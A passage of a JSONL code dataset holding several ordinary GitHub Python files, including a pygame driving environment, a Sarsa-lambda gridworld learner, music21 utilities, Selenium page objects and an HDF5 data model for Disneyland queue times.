+ 210))) * len]\n        RB = [self.center[0] + math.cos(math.radians(360 - (self.angle + 330))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 330))) * len]\n        self.corners = [LT, RT, LB, RB]\n\nclass CarAI:\n    def __init__(self, render = True):\n        pygame.init()\n        self.screen = pygame.display.set_mode((screenWidth, screenHeight))\n        self.clock = pygame.time.Clock()\n        self.font = pygame.font.Font('freesansbold.ttf', 25)\n        self.car = Car('images/car.png', 'images/track-border.png', [400, 50])\n        self.game_speed = 60\n        self.render = render\n        self.mode = 0\n        self.backgroundIMG = pygame.image.load(\"images/background.png\")\n        self.background = pygame.transform.smoothscale(self.backgroundIMG, (screenWidth, screenHeight))\n        self.trackIMG = pygame.image.load(\"images/track.png\")\n        self.track = pygame.transform.smoothscale(self.trackIMG, (screenWidth, screenHeight))\n\n    def action(self, action):\n        if action == 0:\n            self.car.speed += 2\n        if action == 1:\n            self.car.angle += 5\n        elif action == 2:\n            self.car.angle -= 5\n\n        self.car.update()\n        self.car.checkCollision()\n        self.car.checkCheckPoint()\n\n        self.car.eyes.clear()\n        self.car.backEyes.clear()\n        for d in range(-90, 120, 45):\n            self.car.checkEyes(d)\n            
self.car.checkBackEyes(d)\n\n    def evaluate(self):\n        reward = 0\n        if not self.car.alive:\n            reward = -10000 + self.car.distance - (self.car.time/8)\n\n        elif self.car.finish:\n            reward = -10000 + self.car.distance - (self.car.time/8) + 2000\n        return reward\n\n    def finished(self):\n        if not self.car.alive or self.car.finish:\n            self.car.checkPoint = 0\n            self.car.distance = 0\n            return True\n        return False\n\n    def observe(self):\n        # return state\n        eyes = self.car.eyes\n        ret = [0, 0, 0, 0, 0]\n        i = 0\n        for r in eyes:\n            ret[i] = int(r[1] / 20)\n            i += 1\n\n        return ret\n\n    def view(self):\n        # draw game\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                done = True\n\n        self.screen.blit(self.background, (0,0))\n        self.screen.blit(self.track, (0,0))\n\n\n        if self.mode == 1:\n            self.screen.fill((0, 0, 0))\n\n        self.car.eyes.clear()\n        self.car.backEyes.clear()\n        for d in range(-90, 105, 15):\n            self.car.checkEyes(d)\n            self.car.checkBackEyes(d)\n        pygame.draw.circle(self.screen, (255 ,215 ,0), checkPoints[self.car.checkPoint], 15)\n        text = self.font.render(str(checkPoints.index(checkPoints[self.car.checkPoint])+1), True, (0, 0, 0))\n        textRect = text.get_rect()\n        textRect.center = (checkPoints[self.car.checkPoint])\n        self.screen.blit(text, textRect)\n        self.car.drawEyes(self.screen)\n        self.car.draw(self.screen)\n\n        pygame.display.flip()\n        self.clock.tick(self.game_speed)\n","repo_name":"NewtonYuan/CarAI","sub_path":"game/envs/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1307196735","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = []\ny = []\nz = []\ndata = []\n\nkey_names = ['step', 'age', 'mass', 'luminosity', 'radius', 'T_surface', 'T_central', 'density', 'pressure', 'central_electron_degeneracy', 'hydrogen_fraction', 'helium_fraction', 'carbon_fraction', 'nitrogen_fraction', 'oxygen_fraction', 'time_dyn', 'time_KH', 'time_nuc', 'L_pp', 'L_CNO', 'L_3alpha', 'L_z', 'L_v', 'M_He', 'M_C', 'M_O', 'R_He', 'R_C', 'R_O']\n\nwith open('exercise10_4/summary.txt','r') as txtfile:\n    lines = txtfile.readlines()\n    for row in lines:\n        values = []\n        raw_values = row.split()\n        for v in raw_values:\n            values.append(float(v))\n        data.append(dict(zip(key_names, values)))\n    \n\nprint(data[0])\n\nfor d in data:\n    x.append(d['step'])\n    y.append(d['age'])\n\nfig, ax = plt.subplots()\n\nax.plot(x,y, '.')\n#ax.plot(x,z, '-')\n#ax.set_xlabel('step')\n#ax.set_ylabel('radius')\n\n#plt.title('Closest Stars')\n#plt.xticks(np.arange(-0.3, 2, 0.2))\n#plt.yticks(np.arange(-10, 20, 5))\n\nplt.show()\n","repo_name":"LenaMesserschmidt/astro-gk","sub_path":"exercise10_4/stellar_evolution.py","file_name":"stellar_evolution.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16083194488","text":"import sql_connect as sqlcon\nimport employees_dpt_1 as ed\nimport ne04j_connect as neo\n\n\ndef new_manager ():\n    while True:\n        # temp lists to append any eid/did that exists in the database. For checking if they exist. \n        temp_eid = []\n        temp_did = []\n\n        # eid is new_data[0] and did is new_data[1]\n        new_data = []\n\n        print(\"\\nEnter (q) to Quit\")\n        \n        # Requesting EID input. 
\n        new_data.append(input(\"\\nEnter EID: \").upper())\n        \n        \n        if new_data[0] == \"Q\":\n            ed.imp_main()\n\n        # Requesting DID input\n        new_data.append(input(\"Enter DID: \").upper())\n\n        # Getting the EIDs that exist in database. \n        all_eid = sqlcon.get_eid()\n\n        # Getting the DIDs that exist in database. \n        all_did = sqlcon.get_did()\n\n        # appending existing EIDs to eid temp list.\n        for i in all_eid:\n            temp_eid.append(i[\"EID\"])\n\n        # appending existing DIDs to did temp list.\n        for i in all_did:\n            temp_did.append(i[\"DID\"])\n\n        # If both eid and did exist in database, continue to assign new manager. \n        if new_data[0] in temp_eid and new_data[1] in temp_did:\n\n            # Checking if department has a manager assigned on Neo4j. \n            relationship = neo.read_trans(neo.get_dpt_relationship, new_data[1])\n\n            # If the length of relationship is 2, then did is already assigned to an employee. \n            if len(relationship) == 2:\n                print (\"\\nDepartment {} is already managed by Employee {}\".format(relationship[0], relationship[1]))\n            \n            # Otherwise no manager assigned, so proceed to assign the manager to the department. \n            else:\n                neo.write_function(neo.new_manager,new_data)\n                print(\"\\nEmployee {} now manages Department {}\".format(new_data[0], new_data[1]))\n\n        # if the inputted eid is not in the temp list, notify the user and loop back around. \n        if new_data[0] not in temp_eid:\n            print(\"\\nEmployee {} does not exist\".format(new_data[0]))\n\n        # if the inputted did is not in the temp list, notify the user and loop back around. \n        if new_data[1] not in temp_did:\n            print (\"\\nDepartment {} does not exist\\n\".format(new_data[1]))\n    ","repo_name":"RYANCOX00/employees","sub_path":"add_manager_6.py","file_name":"add_manager_6.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71207541033","text":"import time\nfrom unittest import IsolatedAsyncioTestCase\n\nimport async_itertools\n\n\nclass TestAsAsync(IsolatedAsyncioTestCase):\n\n    async def test_without_interval(self):\n        nums = list(range(10))\n        self.assertEqual(nums, [item async for item in async_itertools.as_async(nums)])\n        assert nums == [item async for item in async_itertools.as_async(set(nums))]\n        assert nums == [item async for item in async_itertools.as_async(num for num in nums)]\n\n    async def test_with_interval(self):\n        nums = list(range(5))\n        start = time.time()\n        assert nums == [item async for item in async_itertools.as_async(nums, 0.01)]\n        duration = time.time() - start\n        self.assertGreater(duration, 0.05)\n","repo_name":"gszxy/async-itertools","sub_path":"tests/test_wrapping/test_as_async.py","file_name":"test_as_async.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14208242966","text":"from __future__ import annotations\n\nimport weakref\n\nimport music21\n\nclass TreeYielder: # pragma: no cover\n    def __init__(self, yieldValue=None):\n        '''\n        `yieldValue` should be a lambda function that\n        returns True/False or a function/method call that\n        will be passed the value of a current attribute\n        '''\n        self.currentStack = []\n        self.memo = None\n        self.yieldValue = yieldValue\n        self.stackVals = []\n        self.nonIterables = [int, str, # t.LongType,\n                             float, type(None), bool]\n\n    def run(self, obj, memo=None):\n        '''\n        traverse all attributes of an object looking\n        for subObjects that meet a certain criteria.\n        yield them.\n\n        `memo` is a dictionary to 
keep track of objects\n that have already been seen\n\n The original object is added to the memo and\n also checked for yieldValue\n '''\n if memo is None:\n memo = {}\n self.memo = memo\n if id(obj) in self.memo:\n self.memo[id(obj)] += 1\n return\n else:\n self.memo[id(obj)] = 1\n\n if self.yieldValue(obj) is True:\n yield obj\n\n # now check for sub values...\n self.currentStack.append(obj)\n\n tObj = type(obj)\n if tObj in self.nonIterables:\n pass\n elif tObj == dict:\n for keyX in obj:\n dictTuple = ('dict', keyX)\n self.stackVals.append(dictTuple)\n x = obj[keyX]\n for z in self.run(x, memo=memo):\n yield z\n self.stackVals.pop()\n\n elif tObj in [list, tuple]:\n for i, x in enumerate(obj):\n listTuple = ('listLike', i)\n self.stackVals.append(listTuple)\n for z in self.run(x, memo=memo):\n yield z\n self.stackVals.pop()\n\n else: # objects or uncaught types...\n # from http://bugs.python.org/file18699/static.py\n try:\n instance_dict = object.__getattribute__(obj, '__dict__')\n except AttributeError:\n # probably uncaught static object\n return\n\n for x in instance_dict:\n # noinspection PyBroadException\n try:\n gotValue = object.__getattribute__(obj, x)\n except Exception: # pylint: disable=broad-exception-caught\n continue\n objTuple = ('getattr', x)\n self.stackVals.append(objTuple)\n try:\n for z in self.run(gotValue, memo=memo):\n yield z\n except RuntimeError:\n raise ValueError(f'Maximum recursion on:\\n{self.currentLevel()}')\n self.stackVals.pop()\n\n self.currentStack.pop()\n\n def currentLevel(self):\n currentStr = ''\n for stackType, stackValue in self.stackVals:\n if stackType == 'dict':\n if isinstance(stackValue, str):\n currentStr += \"['\" + stackValue + \"']\"\n else: # numeric key...\n currentStr += '[' + str(stackValue) + ']'\n elif stackType == 'listLike':\n currentStr += '[' + str(stackValue) + ']'\n elif stackType == 'getattr':\n currentStr += \".__getattribute__('\" + stackValue + \"')\"\n else:\n raise ValueError(f'Cannot get attribute for stackType {stackType!r}')\n return currentStr\n\n\ndef testCode(): # pragma: no cover\n class Mock:\n def __init__(self, mockThing, embedMock=True):\n self.abby = 30\n self.mocker = mockThing\n self.mockList = [mockThing, mockThing, 40]\n self.embeddedMock = None\n if embedMock is True:\n self.embeddedMock = Mock(mockThing, embedMock=False)\n\n def mockType(x):\n return x.__class__.__name__ == 'Mock'\n\n subList = [100, 60, -2]\n myList = [5, 20, [5, 12, 17], 30,\n {'hello': 10, 'goodbye': 22, 'mock': Mock(subList)}, -20, Mock(subList)]\n myList.append(myList)\n\n ty = TreeYielder(mockType)\n for val in ty.run(myList):\n print(val, ty.currentLevel())\n\n\ndef testMIDIParse(): # pragma: no cover\n from music21 import converter\n from music21 import common\n from music21 import freezeThaw\n\n # a = 'https://github.com/ELVIS-Project/vis/raw/master/test_corpus/prolationum-sanctus.midi'\n # c = converter.parse(a)\n # c = corpus.parse('bwv66.6', forceSource=True)\n # v = freezeThaw.StreamFreezer(c)\n # v.setupSerializationScaffold()\n # return v.writeStr() # returns a string\n\n a = common.getSourceFilePath() / 'midi' / 'testPrimitive' / 'test03.mid'\n\n # a = 'https://github.com/ELVIS-Project/vis/raw/master/test_corpus/prolationum-sanctus.midi'\n c = converter.parse(a)\n v = freezeThaw.StreamFreezer(c)\n v.setupSerializationScaffold()\n\n def mockType(x):\n return isinstance(x, weakref.ReferenceType)\n\n ty = TreeYielder(mockType)\n for val in ty.run(c):\n print(val, ty.currentLevel())\n\n\ndef 
find_all_exception_classes_in_m21(): # pragma: no cover\n return find_all_classes_by_criteria(\n lambda mm: issubclass(mm, music21.exceptions21.Music21Exception)\n )\n\ndef find_all_non_hashable_m21objects(): # pragma: no cover\n # is a bug if not empty\n def is_unhashable(mm):\n if not issubclass(mm, music21.base.Music21Object):\n return False\n try:\n {mm()}\n except TypeError as te:\n return 'unhashable' in str(te)\n return False\n return find_all_classes_by_criteria(is_unhashable)\n\ndef find_all_non_default_instantiation_m21objects(): # pragma: no cover\n # Lack of default instantiation is not necessarily a bug, but\n # let's try not to have them\n def needs_attributes(mm):\n if not issubclass(mm, music21.base.Music21Object):\n return False\n try:\n mm()\n except TypeError:\n return True\n return False\n return find_all_classes_by_criteria(needs_attributes)\n\n\ndef find_all_classes_by_criteria(criteria): # pragma: no cover\n from collections import deque\n import types\n\n d = deque([music21])\n seen = set()\n matches = set()\n while d:\n m = d.popleft()\n if m in seen:\n continue\n print(m)\n for mm_name in dir(m):\n mm = getattr(m, mm_name)\n if (isinstance(mm, types.ModuleType)\n and mm not in seen\n and 'music21' in getattr(mm, '__file__', '')):\n # noinspection PyTypeChecker\n d.append(mm)\n elif isinstance(mm, type) and mm not in seen and criteria(mm):\n matches.add(mm)\n seen.add(m)\n return matches\n\n\nif __name__ == '__main__':\n pass\n # testCode()\n testMIDIParse()\n","repo_name":"cuthbertLab/music21","sub_path":"music21/test/treeYield.py","file_name":"treeYield.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"70482643113","text":"import random\nfrom pages.base_page import BasePage\nfrom locators.page_locators import PageLocators\nfrom selenium.webdriver.common.keys import Keys\n\nclass PromotionPage(BasePage):\n\n def choose_random_promotional_offer(self):\n\n current_url = self.driver.current_url\n\n promotion_area_label = self.element_is_visible(PageLocators.PROMOTION_AREA).get_attribute('innerHTML')\n promotion_button = random.choice(self.elements_are_visible(PageLocators.PROMOTION_BUTTON))\n promotion_button_label = promotion_button.find_element(*PageLocators.PROMOTION_BUTTONS_AREA).get_attribute('innerHTML')\n promotion_button.send_keys(Keys.ENTER)\n \n return current_url, promotion_area_label, promotion_button_label\n\n def choose_installment_offer(self):\n\n current_url = self.driver.current_url\n \n phone_model = self.element_is_visible(PageLocators.PHONE_MODEL_AREA).get_attribute('innerHTML')\n installment_list = self.element_is_visible(PageLocators.INSTALLMENT_LIST)\n installment_list.click()\n installment_plan = self.driver.find_element(*PageLocators.INSTALLMENT_PLAN)\n installment_plan_id = installment_plan.get_property('value')\n installment_plan_duration = installment_plan.get_attribute('innerHTML').strip().replace(' ', ' ')\n installment_plan_details = installment_plan.get_attribute('data-note').replace('
', '\\n')\n self.driver.find_element(PageLocators.INSTALLMENT_PLAN_ID[0], PageLocators.INSTALLMENT_PLAN_ID[1].replace('installment_plan_id', installment_plan_id)).click()\n installment_list.send_keys(Keys.TAB, Keys.ENTER)\n \n return current_url, phone_model, installment_plan_duration, installment_plan_details\n\n def navigate_to_shopping_cart(self):\n\n current_url = self.driver.current_url\n \n return current_url","repo_name":"AMartsinkevich/A1","sub_path":"pytest_test/pages/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8447605189","text":"import sys\nimport core\n\nw = core.geo_data()\ncore.geo_read(sys.argv[1], w)\n\nbb = core.rect_d(37, 55, 0.01, 0.01)\n\nlayer = core.LayerGeoMap(w)\nref = layer.get_ref()\n\nm2p = core.map2pt(ref, core.Datum(\"wgs84\"), core.Proj(\"lonlat\"))\nr = m2p.bb_bck(bb)\n\nim = layer.get_image(r)\ncore.save(im, \"out.jpg\", {})\n","repo_name":"ushakov/mapsoft","sub_path":"core/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6873037988","text":"import numpy as np\nimport gym\nimport gym_gridworld\nimport itertools\nfrom collections import defaultdict\nimport sys\nfrom gym import wrappers\nimport dill\nimport CreateMovie as movie\nimport os\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\npklfiles = ['SL_PuddleAQ500.pkl', 'SL_PuddleBQ500.pkl', 'SL_PuddleCQ500.pkl']\nmapFiles = [\"map1.txt\", \"map2.txt\", \"map3.txt\"]\nfiguretitle = ['Sarsa lambda Puddle World Problem A',\n 'Sarsa lambda Puddle World Problem B', 'Sarsa lambda Puddle World Problem C']\nplotsave = ['SL_Avg_steps_A_', 'SL_Avg_steps_B_', 'SL_Avg_steps_C_']\nproblemis = [\"A\", \"B\", \"C\"]\nmoviefilename = [\"SL_movieA\", \"SL_movieB\", \"SL_movieC\"]\n\n\ndef plot_avg_steps(num_episodes, avg_steps, slambda):\n x = np.arange(num_episodes)\n plt.clf()\n plt.plot(x, avg_steps)\n plt.title(\"Sarsa lambda Average number of steps to goal for problem \" +\n problemis[grids]+\" lambda \"+str(slambda))\n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Average number of steps\")\n plt.xlim((0, num_episodes))\n plt.savefig(\"SL_Avg_steps_\"+problemis[grids]+\"_lambda_\"+str(slambda) +\n str(num_episodes)+'.png', dpi=300)\n # plt.show()\n\ndef plot_total_return(num_episodes, total_return, slambda):\n x = np.arange(num_episodes)\n plt.clf()\n plt.plot(x, total_return)\n plt.title(\"Sarsa lambda Average Return per episode for problem \" +\n problemis[grids]+\" lambda \"+str(slambda))\n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Average Return\")\n plt.xlim((0, num_episodes))\n plt.savefig(\"SL_return_\"+problemis[grids]+\"_lambda_\"+str(slambda) +\n str(num_episodes)+'.png', dpi=300)\n # plt.show()\n\n# find optimal policy\ndef find_optimal_policy(Q):\n optimal_policy = defaultdict(lambda: np.zeros(1))\n for k, v in Q.items():\n if np.allclose(v, v[0]):\n optimal_policy[k] = 1\n # optimal_policy[k] = np.random.choice(4, 1, p=[0.25, 0.25, 0.25, 0.25])[0]\n else:\n optimal_policy[k] = np.argmax(v)\n return optimal_policy\n\n# Simulate on learned optimal policy\ndef Simulate_sarsa(optimal_policy, num_episodes=10):\n figcount = 0\n env.saveFile = ENABLE_RECORDING\n\n for i in range(num_episodes):\n dis_return = 0\n observation = env.reset()\n\n for i in itertools.count():\n\n a = int(optimal_policy[observation])\n next_observation, 
reward, done, _ = env.step(a)\n\n            env.steps = i\n            dis_return += reward\n            env.dis_return = dis_return\n\n            if ENABLE_RENDERING:\n                env.render(mode='human')\n                env.figurecount = figcount\n                figcount += 1\n\n            if done:\n                env.dis_return = 0\n                env.steps = 0\n                break\n\n            observation = next_observation\n\n# Creates epsilon greedy policy\ndef epsilon_greedy_policy(Q, epsilon, nA):\n    def policy_fn(observation):\n        A = np.ones(nA, dtype=float) * epsilon / nA\n\n        # Taking random action if all are same\n        if np.allclose(Q[observation], Q[observation][0]):\n            best_action = np.random.choice(\n                4, 1, p=[0.25, 0.25, 0.25, 0.25])[0]\n        else:\n            best_action = np.argmax(Q[observation])\n\n        A[best_action] += (1.0 - epsilon)\n        return A\n    return policy_fn\n\n# Sarsa lambda algorithm implementation\ndef sarsa_lambda(env, num_episodes=1000, iterations=50, gamma=0.9, slambda=0.1, alpha=0.1, epsilon=0.1):\n    env.reset()\n    Q = defaultdict(lambda: np.zeros(env.n_actions)) \n    et = defaultdict(lambda: np.zeros(env.n_actions))\n\n\n    for itr in range(iterations):\n        number_of_steps = np.zeros(num_episodes)\n        total_return = np.zeros(num_episodes) \n        Q.clear()\n        et.clear()\n\n        policy = epsilon_greedy_policy(Q, epsilon, env.n_actions)\n        figcount = 0\n\n        for i_episode in range(num_episodes):\n            dis_return = 0\n\n            if (i_episode + 1) % 100 == 0:\n                print(\"\\nIteration: {} Episode {}/{}.\".format(itr,\n                                                              i_episode + 1, num_episodes))\n\n            # Reset the environment and pick the first action\n            observation = env.reset()\n            action_prob = policy(observation)\n            a = np.random.choice(\n                [i for i in range(len(action_prob))], p=action_prob)\n\n            for i in itertools.count(): # Till the end of episode\n                # TAKE A STEP\n                next_observation, reward, done, _ = env.step(a)\n\n                env.steps = i\n                dis_return += reward # Updating return\n                env.dis_return = dis_return\n\n                if ENABLE_RENDERING: # Rendering\n                    env.render(mode='human')\n                    env.figurecount = figcount\n                    figcount += 1\n\n                \n                next_action_probs = policy(next_observation)\n                next_action = np.random.choice(\n                    np.arange(len(next_action_probs)), p=next_action_probs) # Next action\n                TDError = reward + gamma * \\\n                    Q[next_observation][next_action] - Q[observation][a] # TD Error\n                et[observation][a] += 1 # Accumulating traces\n\n                for k, _ in Q.items():\n                    for actions in range(4):\n                        Q[k][actions] += alpha*TDError*et[k][actions] # Sarsa lambda Q update\n                        et[k][actions] = gamma*slambda*et[k][actions] # Eligibility trace update\n\n                if done:\n                    # print(\"Total discounted return is :\", dis_return)\n                    env.dis_return = 0\n                    env.steps = 0\n                    break\n\n                observation = next_observation\n                a = next_action\n            # print(\"Total steps taken is :\", i)\n            number_of_steps[i_episode] = i # Updating Number of steps\n            total_return[i_episode] = dis_return # Updating return\n\n        np.save('SL_saves/SL_avg_num_of_steps_for_problem_' +\n                problemis[grids]+\"_lambda_\"+str(slambda)+\"_itr_\"+str(itr), number_of_steps)\n        np.save('SL_saves/SL_total_return_per_episode_for_problem_' +\n                problemis[grids]+\"_lambda_\"+str(slambda)+\"_itr_\"+str(itr), total_return)\n\n    return Q\n\nfor grids in range(3):\n\n    env = gym.make(\"GridWorld-v0\")\n    filename = pklfiles[grids]\n    ENABLE_RECORDING = False\n    ENABLE_RENDERING = False\n    env.saveFile = ENABLE_RECORDING\n    env.mapFile = mapFiles[grids]\n\n    if problemis[grids] == \"C\":\n        env.westerly_wind = False\n\n    num_episodes = 30\n    iterations = 25\n\n    env.reset()\n    env.first_time = False\n\n    sarsa_lambda_values = [0, 0.3, 0.5, 0.9, 0.99, 1.0]\n\n    for l in range(len(sarsa_lambda_values)):\n        env.figtitle = figuretitle[grids]+\" lambda 
\"+str(sarsa_lambda_values[l])\n \n\n Q = sarsa_lambda(env, num_episodes=num_episodes, iterations=iterations,\n gamma=0.9, slambda=sarsa_lambda_values[l] ,alpha=0.1, epsilon=0.1)\n\n if ENABLE_RECORDING:\n movie.CreateMovie(moviefilename[grids], 5)\n\n # Plotting\n avg_number_of_steps = np.zeros(num_episodes)\n total_return_per_episode = np.zeros(num_episodes)\n\n for i in range(iterations):\n avg_number_of_steps += np.load('SL_saves/SL_avg_num_of_steps_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l])+\"_itr_\"+str(i)+\".npy\")\n total_return_per_episode += np.load('SL_saves/SL_total_return_per_episode_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l])+\"_itr_\"+str(i)+\".npy\")\n\n avg_number_of_steps /= iterations\n total_return_per_episode /= iterations\n np.save('SL_saves/SL_avg_num_of_steps_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), avg_number_of_steps)\n np.save('SL_saves/SL_total_return_per_episode_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), total_return_per_episode)\n\n # plot_avg_steps(num_episodes, avg_number_of_steps,\n # sarsa_lambda_values[l])\n # plot_total_return(\n # num_episodes, total_return_per_episode, sarsa_lambda_values[l])\n\n # Finding optimal policy based on Q\n optimal_policy = find_optimal_policy(Q)\n env.optimal_policy = optimal_policy\n\n # Drawing arrows of optimal policy\n env.draw_arrows = True\n env.render(mode='human')\n\n # # For recording video of simulation\n # env.draw_arrows = False\n ENABLE_RENDERING = True\n ENABLE_RECORDING = True\n\n if ENABLE_RECORDING:\n Simulate_sarsa(optimal_policy, 5)\n movie.CreateMovie(\n moviefilename[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), 5)\n\n# Plotting all 3 problems graph togeather\nimport Sarsa_lambda_plot\n","repo_name":"niravnb/Reinforcement-learning","sub_path":"Q Learning, Sarsa and Policy Gradients/Code/Q1_Q_learning_Sarsa/Sarsa_lambda.py","file_name":"Sarsa_lambda.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"337131450","text":"import h5py\nimport numpy as np\nfrom global_functions import create_waits_csv\n\n\ndef attach_time_scale(file, path, dummy_data, dtype):\n \"\"\" create a dataset to store the storage times of the data and then add it as a dimension scale to the actual\n datasets\n\n :param file: the HDF5 file in which the dataset is to be stored (HDF5 file)\n :param path: the path to the actual datasets (string)\n :param dummy_data: storage times for initializing the dataset, so that further values can be added to it\n later on (numpy array with d_type 'S26')\n :param dtype: the data type of the dummy data (numpy dtype)\n \"\"\"\n dset_time = file.create_dataset(f'{path}_times', data=dummy_data, maxshape=(None,), dtype=dtype,\n chunks=True)\n dset_time.make_scale('storage_time')\n dset_content = file[path]\n dset_content.dims[0].attach_scale(dset_time)\n\n\ndef attach_metadata_rides(ride_name, topic_area, dset, source):\n \"\"\" generate metadata for a ride and attach the metadata to the corresponding dataset\n\n :param ride_name: the name of the ride (string)\n :param topic_area: the topic area the ride belongs to (string)\n :param dset: the HDF5 dataset of the corresponding ride (HDF5 dataset)\n :param source: the website where the data is taken from (string)\n \"\"\"\n if source == 'q_times':\n website = 'www.queue-times.com'\n else:\n website = 
'www.queue-park.com'\n attrs_dict = {'name_ride': ride_name, 'name_park': 'Disneyland Paris', 'topic_area': topic_area,\n 'units_waiting_time': 'min', 'time_delta': '1', 'time_units': 'min', 'source': website,\n 'missing_values': -1}\n for attr in attrs_dict:\n dset.attrs[attr] = attrs_dict[attr]\n\n # add an attribute indicating the number of data points that are dummy data\n dset.attrs['dummy_data_to_delete'] = dset.shape\n\n\ndef attach_metadata_weather(time_frame, file, path):\n \"\"\" generate metadata for a weather forecast and attach the metadata to the corresponding dataset\n\n :param path: the path to the weather forecast dataset (string)\n :param file: the HDF5 file in which the weather forecast dataset is stored (HDF5 file)\n :param time_frame: the time frame of the forecast (today, tomorrow or next week; string)\n \"\"\"\n dset = file[path]\n if time_frame == 'next_week':\n time_delta = 8 # the values correspond to time windows of 8 hours\n else:\n time_delta = 1 # the values correspond to time windows of 1 hour\n attrs_dict_weather = {'location': 'paris', 'time_delta': time_delta, 'time_units': 'hours',\n 'source': 'www.weather-forecast.com', 'unit_temp': '°C',\n 'unit_prec': 'mm', 'unit_wind_speed': 'km/h', 'unit_humidity': 'percent',\n 'unit_felt_temp': '°C', 'description': f'weather forecast collected for {time_frame}',\n 'dummy_data_to_delete': dset.shape, 'missing_values': -111}\n for name in attrs_dict_weather:\n dset.attrs[name] = attrs_dict_weather[name]\n\n\ndef create_hdf5_file(name, mode):\n \"\"\" create a HDF5 file with the specified name, create groups for the rides and weather forecasts and\n add corresponding records\n\n :param name: the name of the HDF5 file (string)\n :param mode: the mode in which the file should be opened (string)\n \"\"\"\n # create file\n f = h5py.File(f'{name}.hdf5', mode)\n\n # data model for the rides\n\n # indicate which rides were selected\n # five rides that had the highest wait times on average according to the Queue Times website in 2022 were selected\n rides = {'princess_pavilion': ['Princess Pavilion', 'Fantasyland'],\n 'meet_mickey': ['Meet Mickey Mouse', 'Fantasyland'],\n 'peter_pans_flight': ['Peter Pan\\'s Flight', 'Fantasyland'],\n 'big_thunder_mountain': ['Big Thunder Mountain', 'Frontierland'],\n 'orbitron': ['Orbitron®', 'Fantasyland']}\n websites = ['q_times', 'q_park'] # the two website sources\n\n # create dummy data to initialize the datasets and to be able to append to it\n dummy_waits = np.repeat(-1, 2)\n dt_storage_time = np.dtype('S26') # since the ISO-format of timestamps is of length 26\n dummy_timestamps = np.array(['1800-01-01T00:00:00.000000', '1800-01-02T00:00:00.000000'], dtype=dt_storage_time)\n\n # create for each ride two datasets (one per website)\n for ride in rides.keys():\n for site in websites:\n path_dset = f'/rides/{ride}/{site}'\n\n # chunked storage is necessary to be able to resize the dataset\n dset_ride = f.create_dataset(path_dset, data=dummy_waits, maxshape=(None,), dtype='int16', chunks=True)\n\n # add metadata to the datasets\n attach_metadata_rides(rides[ride][0], rides[ride][1], dset_ride, site)\n\n # attach a dataset that holds storage times as dimension scale to the ride datasets\n attach_time_scale(f, path_dset, dummy_timestamps, dt_storage_time)\n\n # data model for temperature forecasts\n\n # define a compound data type for the weather data (the columns are in the same order as in the table on the website\n # to facilitate data retrieval and storage)\n dt_day = 
np.dtype([('wind_speed', np.int16), ('precipitation', np.float16), ('temp', np.int16),\n ('felt_temp', np.int16), ('humidity', np.int16)])\n\n dt_next_week = np.dtype([('wind_speed', np.int16), ('precipitation', np.float16), ('highest_temp', np.int16),\n ('lowest_temp', np.int16), ('felt_temp', np.int16), ('humidity', np.int16)])\n\n # create dummy temperature data with the same shape as the final datasets\n dummy_day = np.repeat(-99, 48).reshape(2, 24) # 24 measurements per day (1 per hour)\n dummy_day = np.array(dummy_day, dtype=dt_day)\n dummy_next_week = np.repeat(-99, 6).reshape(2, 3) # 3 measurements per day (1 every 8 hours)\n dummy_next_week = np.array(dummy_next_week, dtype=dt_next_week)\n\n # create datasets for the weather forecasts (for today, tomorrow and next week)\n time_frames = ['today', 'tomorrow']\n for frame in time_frames:\n f.create_dataset(f'/weather/{frame}', data=dummy_day, maxshape=(None, 24), dtype=dt_day, chunks=True)\n f.create_dataset(f'weather/next_week', data=dummy_next_week, maxshape=(None, 3), dtype=dt_next_week, chunks=True)\n\n # add the storage time as a dimension scale to the weather datasets and attach metadata\n time_frames.append('next_week')\n for frame in time_frames:\n path_dset = f'weather/{frame}'\n attach_time_scale(f, path_dset, dummy_timestamps, dt_storage_time)\n attach_metadata_weather(frame, f, path_dset)\n\n # close the HDF5 file\n f.close()\n\n\nif __name__ == '__main__':\n # create the hdf5 file with the specified data model\n create_hdf5_file('disneyland', 'w')\n\n # create the csv file for aggregating wait times before storing them in the HDF5 file\n create_waits_csv('waits_q_times.csv')\n create_waits_csv('waits_q_park.csv')\n","repo_name":"StephanieHochge/Web-Scraping-Disneyland","sub_path":"hdf5_data_model.py","file_name":"hdf5_data_model.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14704095960","text":"import subprocess\nimport configparser\nimport time\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom xmlrpc.server import SimpleXMLRPCRequestHandler\n\nconfig = 